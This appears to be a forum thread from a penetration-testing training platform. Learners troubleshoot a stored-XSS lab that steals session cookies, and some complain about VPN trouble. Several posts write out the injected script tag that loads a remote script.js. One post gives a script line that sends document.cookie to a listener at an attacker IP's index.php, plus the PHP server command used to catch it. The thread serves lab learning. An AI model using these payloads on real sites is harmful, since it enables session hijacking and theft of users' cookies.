I’ve been trying for hours now to get this very simple exercise done. Luckily, the VPN doesn’t work (after wasting a lot of time on trying to get it working properly), so I was able to just type everything directly into the PwnBox.
I’m able to get the
script.js to download but after that, the site never reaches back out for
index.php. After reading the forums, it seems that I’m not alone. Is there a way to get around this? Because the HTB infrastructure is broken, I think there’s got to be a different way than the obvious, simple solution.
Hey dude! Sorry that you have been having a rough go of it. Paste the XSS line you are injecting into the form so we can help you. Edit Paste the contents of your
script.js too, that might be the issue.
On a separate note, what errors were you getting with the VPN?
No problem. I used both of these along with the dynamically assigned IP:
These were both tried as the contents of
script.js. I even put
<script>...stuff...</script> tags around it just in case I was missing something.
Then the XSS payload in the image field was updated to
...imgurl="><script src=http://IP:8080/script.js></script>. The XSS was successful and reached back to the PHP server I instantiated to grab the script. After that, silence. There was never a call to hit
index.php (which was also in the same local directory as
The VPN is as unstable as a one-legged stool. It drops for no reason (even though it’s configured as a VPN Connection in Kali’s network configuration settings). When it does work, it’s a hope and prayer that I will actually be able to connect to the resources. Sometimes they just time out and I get no response; other times it takes an incredible amount of time to load a resource/page; other times it works speedily with no problems. Pentesting is difficult enough as it is - it’s incredibly frustrating to drain even more time and mental bandwidth constantly chasing my tail in order to get basic resources to function properly. I have tried both US1 and US2 for endpoints.
Thanks for reaching out.
Alright, so your
script.js looks like it should be good, as long as one of those is in there with the right IP:PORT. And then just make sure the index.php file is created without changes from the code they supply.
The XSS payload can probably look more like just this though. Though it might be a spoiler if you didn’t try all the payloads.
Guessing that you already made sure you were using the right field to complete the challenge? As only one field actually works from what I have found.
On the VPN topic. You shouldn’t need to configure anything to get the VPN to work. The vpn profile should be downloaded as something like
username.ovpn and then you should just open a cli and run(maybe as root or with sudo)
At least that’s all I have ever done when I have used it and it has worked fine for me.
Give that XSS another go and if it still doesn’t work post screenshots of your XSS payload and script.js.
I have been noticing that the new pwnbox’s default to the
/root directory, make sure that you are in the default home directory. That just got me when I started it up and did the challenge. Everything seems to be working fine on the backend though.
hello @onthesauce !!
Still I am facing the same issue as specified by Joe earlier. My script.js looks like this-new Image().src=‘http:/10.10.14.111:89/index.php?c=’+document.cookie; and my index.php is the one which they supplied (I use the code as it is). Both index.php and script.js are located in the same directory /tmp/tmpserver…
And I start the PHP server using- sudo php -S 10.10.14.111:89…
I enter the payload as "> in the vulnerable field of the application. I get a callback on my PHP server only for script.js as shown in the attached pic and not for index.php.
Also one query is after uploading my payloads in the vuln field and the app shows as “Thank you for registering”, post this do I need to copy the entire URL of the application with the submitted payload and then again load this copied URL in the browser to get the cookie?
Request you to please support me on this as I ve been banging my head since 2 months. Earlier you have helped me out in one of the labs too so would appreciate if u could support here.
I solved it thanks!!! @onthesauce
Hey no worries! Where was your problem?
Not sure though. The methodology was correct, but this time i started fresh and it suddenly worked out for good!
Thanks though for checking!
Am yet to solve mamy modules from now on, so no wonder i ll catch up with u very soon mate!!!
Please stay in touch and massive respect!
Merry Christmas💥 @onthesauce
FOR FUTURE REFERENCE: make sure you put the port number in your script.js file…
you seem to have an excellent grasp on this. I am insanely stuck. I have followed all the steps, followed all the help, used the correct syntax and everything, but I don’t seem to get a response after I send the payload through. please help!
Thanks and no worries, XSS is a crazy hard module! DM me the steps you have gone through and the payload that you are submitting. I will double check it and see if I can help you out.
For those who encounter the problem: “(null) /script” I have a suggestion for you that you should start the php server listening in the directory where you are creating the script.js file. I had this problem before and tried again and it worked.